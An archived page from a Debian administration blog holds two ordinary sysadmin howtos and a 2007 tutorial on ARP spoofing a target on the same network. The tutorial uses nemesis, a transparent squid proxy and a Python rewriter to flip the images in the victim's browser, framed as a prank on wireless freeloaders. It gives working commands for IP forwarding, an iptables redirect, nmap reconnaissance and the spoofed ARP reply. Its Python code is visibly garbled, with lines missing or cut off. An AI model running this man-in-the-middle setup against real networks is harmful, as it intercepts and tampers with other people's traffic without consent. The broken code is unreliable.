This site is now 100% read-only, and retired.

XML Logo

Posted by johns on Wed 21 Jul 2010 at 12:04
Tags: , ,

This howto explains how I migrated/converted a Debian Lenny vserver container to a KVM (libvirt) virtual machine. The instructions can only be followed as-is if you used the newvserver script (from the vserver-debiantools package) to create your vserver container.

This entry has been truncated read the full entry.


Posted by johns on Tue 31 Mar 2009 at 19:54

I recently upgraded a few computers from Etch to Lenny. Unfortunately, all of these had at least two monitors and two graphics cards. After installing Lenny I tried to configure Xinerama, and the X server crashed.

Some googling led me to these two pages.

The version of X.Org in Lenny no longer supports Xinerama on multiple graphics cards, and xrandr 1.2 doesn't support multiple graphics cards. It seems that support for it is being worked on for xrandr 1.3, but in the meantime I needed to get it working. Here are my notes.

This entry has been truncated read the full entry.


Posted by johns on Tue 18 Sep 2007 at 21:06
Tags: none.

The idea comes from, which describes how to have fun with wireless freeloaders by flipping all images requested by their browser (there's a screenshot on the page).
In this article I'm going to describe how to do it in a different way - instead of modifying the gateway, I'm going to use ARP spoofing (also called ARP poisoning) to trick the target box into thinking that my box is the gateway.
(This article assumes that both the attacker and target are on the same private network.)

What are ARP and ARP spoofing anyway?
ARP, or Address Resolution Protocol, is used to translate IP addresses to Ethernet MAC addresses.
The kernel maintains an ARP cache that can be viewed by typing /usr/sbin/arp. When you try to access an IP address that isn't in the cache, an ARP request ("who has <IP>? tell <MAC>") is sent to broadcast. The target computer then sends back an ARP reply ("<IP> is at <MAC>").
ARP is a stateless protocol, so one can easily send a spoofed ARP reply at any time.

For better and more complete descriptions:

Let's start by installing some prerequisites.
If you already have a HTTP server installed, or if you don't want to use httpd, remove it from the command below.
# apt-get install squid nemesis imagemagick thttpd

Squid is a caching HTTP proxy that has the nice feature of letting one define a script to rewrite URLs. Nemesis will be used for sending fake ARP replies, imagemagick for transforming images, and thttpd for serving transformed images to the proxy server.

# nano /usr/local/bin/squidupsidedown

Copy and paste the following code:

#!/usr/bin/env python
import os, sys
import urllib, re, subprocess
outdir = '/var/www/squidupsidedown'
wwwpath = 'http://localhost/squidupsidedown';
img_regex = re.compile(r'(?i).(jpg|jpeg|png|gif)$')
operation = '-flip' # mogrify -help for more options
operation = operation.split()
count = 0
while True:
        l = raw_input().split(' ')
        url = l[0]
        m =
        if m:
                outname = '%d-%d.%s' % (os.getpid(), count,
                outpath = os.path.join(outdir, outname)
                count += 1
                        urllib.urlretrieve(url, outpath)
                        os.chmod(outpath, 0644)
              ['mogrify'] + operation + [outpath])
                        print '/'.join([wwwpath, outname])
                except (IOError, urllib.ContentTooShortError):
                        print url

                print url

Save the file.

# chmod +x /usr/local/bin/squidupsidedown
# mkdir /var/www/squidupsidedown
# chown proxy /var/www/squidupsidedown

squidupsidedown is a simple squid URL rewriter. Squid URL rewriters are expected to read a URL from stdin and write a (possibly changed) URL to stdout.
In this case, if the URL ends in .jpg/.png/.gif, it is assumed to be a image and is downloaded to /var/www/squidupsidedown and transformed using mogrify. The URL http://localhost/squidupsidedown/pid-count.ext is then passed to squid.
By default images are flipped, but any operation supported by mogrify (-help) can be used.

We have to make a few changes to squid.

# nano /etc/squid/squid.conf
Around line 73:

http_port 3128 transparent

This enables transparent proxying.

Around line 2577 (substitute with your network):

acl our_networks src
http_access allow our_networks

Around line 1464:

url_rewrite_program /usr/local/bin/squidupsidedown

Restart squid.

# invoke-rc.d squid restart

Enable IP forwarding in the kernel. This is necessary so that our box will work as a gateway, also for non-HTTP traffic, for the target.

# echo 1 > /proc/sys/net/ipv4/ip_forward

Enable transparent proxying. Substitute eth0 with the appropriate network interface.

# iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 3128

With all the setup completed, it's time for the attack itself. Define the variables below, where my_macaddr is the MAC address of your (attacking) box, gw_ipaddr is the IP address of the gateway/router, target_macaddr is the MAC address of the target, and target_ipaddr is the IP address of the target.


To get these you can:
* nmap the network, you have to be root to see MAC addresses:
# nmap
* Or if you know the IP address of the target:
$ ping -c 1; /usr/sbin/arp

To get your own MAC address type /sbin/ifconfig.

Send a spoofed ARP reply. For more information on the arguments, type nemesis arp help. Again, substitute eth0 with the appropriate network interface.

# nemesis arp -S $gw_ipaddr -D $target_ipaddr -h $my_macaddr -m $target_macaddr -r -d eth0 -H $my_macaddr -M $target_macaddr

The target will update its ARP cache occasionally. The above command will have to be repeated when it does (you can put the command in a loop).
On the target, type /usr/sbin/arp (linux) or arp (windows). If it worked, you should see your own MAC address instead of the gateway MAC address.

When testing remember that the browser caches images. If it doesn't appear to work, visit another page or clear the cache.


(This is my first post on debian-administration, so a brief introduction: My name is John, I'm 19 and a Linux user since 2002. This site has been very useful to me on multiple occasions, and hopefully this will be useful or at least entertaining to someone. Comments are welcome.)